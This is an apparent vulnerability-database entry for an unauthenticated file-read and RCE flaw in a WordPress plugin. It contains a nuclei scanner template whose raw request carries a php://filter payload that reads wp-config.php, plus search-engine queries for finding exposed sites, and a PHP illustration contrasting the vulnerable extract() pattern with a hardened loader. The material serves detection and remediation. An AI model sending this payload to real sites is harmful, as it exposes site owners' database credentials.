Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com | 115 views

Extensive VC Addons for WPBakery page builder before 1.9.1 allows unauthenticated attackers to read arbitrary files from the host's file system and to escalate to RCE using PHP filter chains. Fixed in version 1.9.1.

Code
id: CVE-2023-0159

info:
  name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
  author: c4sper0
  severity: high
  description: |
    The plugin does not validate a parameter passed to the PHP extract() function when loading templates, allowing an unauthenticated attacker to override the template path and read arbitrary files from the host's file system. This may be escalated to RCE using PHP filter chains.
  impact: |
    Unauthenticated attackers can exploit parameter validation flaws in the template loading mechanism to read arbitrary files including wp-config.php and escalate to remote code execution using PHP filter chains.
  remediation: Fixed in 1.9.1
  reference:
    - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
    - https://github.com/im-hanzou/EVCer
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/xu-xiang/awesome-security-vul-llm
    - https://wordpress.org/plugins/extensive-vc-addon/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-0159
    epss-score: 0.55736
    epss-percentile: 0.98919
    cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wprealize
    product: "extensive_vc_addons_for_wpbakery_page_builder"
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/"
    fofa-query: "body=/wp-content/plugins/extensive-vc-addon/"
    publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
  tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"status":"success","message":"Items are loaded","data":'

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008f0bb61bd55218a11d13817c6710de8d3e547bf9116030795436143a230810a2022100bb823b8eb61b5a56ea46fc2730ed53a45ec05ba44673b4278ea034549ec7dbcc:922c64590222798bb761d5b6d8e72950
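To make the described flaw concrete from the defender's side, here is an added PHP illustration (not the plugin's code) of the extract() variable-overwrite pattern beside a hardened template loader; the function names, the template directory layout and the constructed demo files are assumptions made for the example.

```php
<?php
// Added illustration of the extract() variable-overwrite pattern the advisory describes.
// Not the plugin's code: function names and the template directory layout are assumptions.

// Vulnerable pattern: extract() over request-controlled data redefines $template, so the
// later include follows whatever path or php:// wrapper the request supplied
// (php://filter/convert.base64-encode/resource=... turns the include into a file read).
function load_template_vulnerable(array $options, string $template_dir): string
{
    $template = $template_dir . '/default.php';  // intended default
    extract($options);                             // $options['template'] silently overrides it
    ob_start();
    include $template;
    return (string) ob_get_clean();
}

// Hardened pattern: request data never becomes a variable name or a path fragment. The
// requested name is mapped through an allowlist and the resolved path must stay inside
// $template_dir; realpath() rejects stream wrappers and missing files outright.
function load_template_hardened(array $options, string $template_dir): string
{
    $allowed = ['default' => 'default.php', 'grid' => 'grid.php'];
    $name = isset($options['template']) ? (string) $options['template'] : 'default';
    if (!array_key_exists($name, $allowed)) {
        throw new InvalidArgumentException('Unknown template: ' . $name);
    }
    $dir  = realpath($template_dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $allowed[$name]);
    if ($dir === false || $path === false
        || strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        throw new RuntimeException('Template path escaped the template directory');
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Demo on constructed files in a temporary directory.
$dir = sys_get_temp_dir() . '/evc_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/default.php', 'default template');
file_put_contents($dir . '/secret.txt', 'DB_PASSWORD=constructed-sample');
$request = ['template' => $dir . '/secret.txt'];         // constructed hostile request value
echo load_template_vulnerable($request, $dir), PHP_EOL;  // leaks the secret file
try {
    load_template_hardened($request, $dir);
} catch (Exception $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;         // allowlist rejects the value
}
```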

Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (High risk); CVSS 3.1: 7.5; EPSS: 0.55736; 115 views